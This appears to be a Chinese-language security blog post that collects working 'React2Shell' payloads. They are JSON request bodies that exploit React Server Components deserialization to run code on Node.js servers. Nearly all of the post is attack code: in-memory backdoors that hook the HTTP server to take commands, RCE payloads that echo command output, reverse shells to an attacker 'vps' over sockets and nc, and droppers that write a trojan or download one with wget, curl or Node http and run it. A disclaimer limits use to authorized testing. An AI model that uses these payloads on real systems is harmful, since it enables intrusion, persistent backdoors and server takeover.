React2Shell的一些payload
免责声明
本文的知识内容,仅供网络安全从业人员学习参考
用于已获得合法授权的网站测试,请勿用于其它用途
请勿使用本文中的工具、技术及资料,
对任何未经授权的网站、系统进行测试,
否则,所造成的直接或间接后果,
均由您自行承担
内存马
1
2
3
4
5
6
7
8
9
10
11
12
13
| {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "(async()=>{const http=await import('node:http');const url=await import('node:url');const cp=await import('node:child_process');const originalEmit=http.Server.prototype.emit;http.Server.prototype.emit=function(event,...args){if(event==='request'){const[req,res]=args;const parsedUrl=url.parse(req.url,true);if(parsedUrl.pathname==='/exec'){const cmd=parsedUrl.query.cmd||'whoami';cp.exec(cmd,(err,stdout,stderr)=>{res.writeHead(200,{'Content-Type':'application/json'});res.end(JSON.stringify({success:!err,stdout,stderr,error:err?err.message:null}));});return true;}}return originalEmit.apply(this,arguments);};})();",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
| {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "try{var h=process.mainModule.require('http');var c=process.mainModule.require('child_process');var u=process.mainModule.require('url');if(!h.Server.prototype.emit.__hooked){var o=h.Server.prototype.emit;h.Server.prototype.emit=function(e,q,s){if(e==='request'&&q.url&&q.url.indexOf('/health-check-api')!==-1){try{var p=u.parse(q.url,true);var cmd=p.query.c||'id';c.exec(cmd,function(E,O,R){if(!s.headersSent){s.writeHead(200,{'Content-Type':'text/plain'});}s.end(O+R)})}catch(ex){s.end(ex.toString())}return true}return o.apply(this,arguments)};h.Server.prototype.emit.__hooked=true}}catch(e){}",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
| {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var h=process.mainModule.require('http'),c=process.mainModule.require('child_process');if(!h.Server.prototype.emit.__h){var o=h.Server.prototype.emit;h.Server.prototype.emit=function(e,q,s){if(e==='request'&&q.headers&&q.headers['x-k']==='MS'){try{c.exec(q.headers['c']||'id',function(E,O,R){if(!s.headersSent)s.writeHead(200);s.end(O+R)})}catch(x){return o.apply(this,arguments)}return true}return o.apply(this,arguments)};h.Server.prototype.emit.__h=true}",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
|
RCE回显式(会造成堵塞,只建议用来验证漏洞)
spawnSync
1
2
3
4
5
6
7
8
9
10
11
12
13
| {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').spawnSync('cat',['server.js'],{timeout:2000}).stdout.toString();throw Object.assign(new Error('x'),{digest:res});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
|
execSync
1
2
3
4
5
6
7
8
9
10
11
12
13
| {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('id').toString();throw Object.assign(new Error('x'),{digest:res});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
|
RCE无回显(适合反弹shell)
spawn
1
2
3
4
5
6
7
8
9
10
11
12
13
| {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var net=process.mainModule.require('net'),cp=process.mainModule.require('child_process'),sh=cp.spawn('/bin/sh',[]);var client=new net.Socket();client.connect(vps port,'vps ip',function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client)});var res='connected';throw Object.assign(new Error('x'),{digest:res});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
| {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').spawn('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc vpsip vps port >/tmp/f',[],{ shell: true }).stdout.toString();throw Object.assign(new Error('x'),{digest:res});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
|
exec
1
2
3
4
5
6
7
8
9
10
11
12
13
| {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc vpsip vpsport >/tmp/f').toString();throw Object.assign(new Error('x'),{digest:res});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
|
C2上线
方案一:Base64 纯写入
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var fs=process.mainModule.require('fs'),cp=process.mainModule.require('child_process');var b64='base64代码';fs.writeFileSync('/tmp/shell',Buffer.from(b64,'base64'));cp.spawnSync('chmod',['+x','/tmp/shell']);var p=cp.spawn('/tmp/shell',[],{detached:true,stdio:'ignore'});p.unref();var res='[MS] Trojan Dropped & Running. PID:'+p.pid;throw Object.assign(new Error('x'),{digest:res});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
|
方案二:系统 Wget/Curl 下载
1
2
3
4
5
6
7
8
9
10
11
12
13
| {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var cp=process.mainModule.require('child_process');cp.spawnSync('/bin/sh',['-c','(wget -q -O /tmp/shell http://vps/tcp_linux_amd64 || curl -s -o /tmp/shell http://vps/tcp_linux_amd64) && chmod +x /tmp/shell && /tmp/shell &'],{timeout:5000});var res='[MS] Download Command Triggered via Shell';throw Object.assign(new Error('x'),{digest:res});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
|
方案三:Node.js 原生下载
1
2
3
4
5
6
7
8
9
10
11
12
13
| {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var h=process.mainModule.require('http'),f=process.mainModule.require('fs'),c=process.mainModule.require('child_process');var s=f.createWriteStream('/tmp/shell');h.get('http://vps/tcp_linux_amd64',function(r){r.pipe(s);s.on('finish',function(){s.close(function(){c.spawnSync('chmod',['+x','/tmp/shell']);var p=c.spawn('/tmp/shell',[],{detached:true,stdio:'ignore'});p.unref();})})});var res='[MS] Node.js Native Download Started in Background';throw Object.assign(new Error('x'),{digest:res});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
|
可以配合下一篇文章VShell无VPS上线的几种方式来进行测试
以上方式均基于合法授权测试环境演示,请严格遵守网络安全法律法规,仅在授权范围内使用相关技术。
**注:**本文仅介绍几种典型方案,实际可用的方法与工具远不止于此。文章内容若有错漏,或您有更好的方案,欢迎留言交流。
